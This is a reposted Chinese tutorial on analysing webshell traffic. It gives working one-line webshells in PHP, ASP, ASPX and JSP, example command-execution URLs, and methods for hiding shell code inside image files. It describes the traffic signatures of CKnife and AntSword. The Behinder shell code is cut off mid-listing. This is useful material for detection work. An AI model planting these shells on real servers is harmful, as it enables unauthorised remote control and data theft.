当前位置: 首页 > news >正文

Webshell流量分析

news 2025/9/13 18:32:14

Webshell流量分析

常见的一句话木马:

asp一句话 <%eval request("pass")%>
aspx一句话 <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php一句话 <?php @eval($_POST["pass"]);?>

什么是Webshell

  • Webshell看起来和普通的服务端脚本一样,看起来就像普通的代码。
  • Webshell对本地资源具备一定的操作能力,其操作本地资源的范围取决于解析器的权限。
# webshell: 1.php
<?php echo system($_GET["cmd"]);?>
# 利用方式 
http://ip:port/hackable/uploads/1.php?cmd=ls

# webshell: 2.php
<?php eval($_GET["cmd"]);?>
# 利用方式
http://ip:port/hackable/uploads/2.php?cmd=phpinfo();

#  webshell: 3.php
<?php include "shell.jpg";?>
# 利用方式
# 上传shell.jpg到同一目录,其中包含代码<?php phpinfo();?>
# 文件也可以是shell.jsp、shell.txt
http://ip:port/hackable/uploads/3.php

Webshell恶意函数

fwrite:写入文件(可安全用于二进制文件)。
eval:把字符串作为PHP代码执行。
exec:执行一个外部程序。
system:执行外部程序,并且显示输出。
stripslashes:反引用一个引用字符串。
inflate:inflate方法的主要作用就是将xml转换成一个View对象,用于动态的创建布局。
gzinflate:gzinflate(),gzdeflate()是压缩与解压缩算法。
passthru:执行外部程序并且显示原始输出。
move_uploaded_file:将上传的文件移动到新位置。
phpinfo:输出关于 PHP 配置的信息。

图片马制作方式

copy命令:

CMD命令:copy 1.jpg/b+1.php/a 2.jpg

PS软件:

PS打开图片,在文件—>文件简介里插入需要的木马代码,最后:文件—>保存【保存:覆盖原文件,也可以另存为其他格式】。

edjpg软件:

将图片直接拖到edjpg.exe上,在弹出窗口内输入一句话木马即可。

十六进制编辑器:

用010 Editor或winhex等十六进制编辑器打开图片,将一句话木马插入到右边最底层或最上层后保存。

Webshell流量分析

CKnife 菜刀

Webshell代码:

# npc.php
<?php eval($_POST["npc"]);?>

流量特征:

  • 明文传输。
  • npc是php一句话木马的password。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Antsword 蚁剑

Webshell代码:

# 4.jsp<%!
class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}
}
%>
<%
String cls=request.getParameter("ant");
if(cls!=null){new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext);
}
%>

流量特征:

  • 明文传输。
  • ant是jsp一句话木马的password。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Behinder 冰蝎2

Webshell代码:

# behinder.php,密码pass<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{$key
http://www.lryc.cn/news/247950.html

相关文章:

  • 高级IO—poll,epoll,reactor
  • 一文详解Python中常用数据类型
  • 【MATLAB源码-第85期】基于farrow结构的滤波器仿真,截止频率等参数可调。
  • ChatGPT Plus/GPT4高级数据分析和插件功能详解
  • 【Android Jetpack】Room数据库
  • 自定义中间件
  • 优化机器学习:解析数据归一化的重要性与应用
  • 五分钟,Docker安装flink,并使用flinksql消费kafka数据
  • 【小聆送书第一期】让架构师的成神之路温暖你这个不景气的冬天
  • 网页爬虫反扒措施有哪些?
  • C#实现批量生成二维码
  • 3种在ArcGIS Pro中制作山体阴影的方法
  • 【ChatGLM2-6B】Docker下部署及微调
  • 输入两个整数,输出它们的乘积。 ← Python 及 C++ 代码比较
  • C语言——从键盘输人一个表示年份的整数,判断该年份是否为闰年,并显示判断结果。
  • 出于隐私和安全的考虑,有时需要从谷歌删除你的个人数据,有两种方法
  • 【同一局域网下】两台电脑之间互ping
  • 【精选】Ajax技术知识点合集
  • 智能优化算法应用:基于水循环算法无线传感器网络(WSN)覆盖优化 - 附代码
  • java-netty知识点笔记和注意事项
  • 英伟达不同系列GPU介绍
  • C语言——I /深入理解指针(二)
  • MySQL使用函数和存储过程实现:向数据表快速插入大量测试数据
  • 力扣labuladong——一刷day59
  • 接口性能测试 —— Jmeter并发与持续性压测
  • redis报错3
  • Proteus的网络标号与总线
  • 4、stable diffusion
  • LeetCode51. N-Queens
  • 前端vue3——html2canvas给网站截图生成宣传海报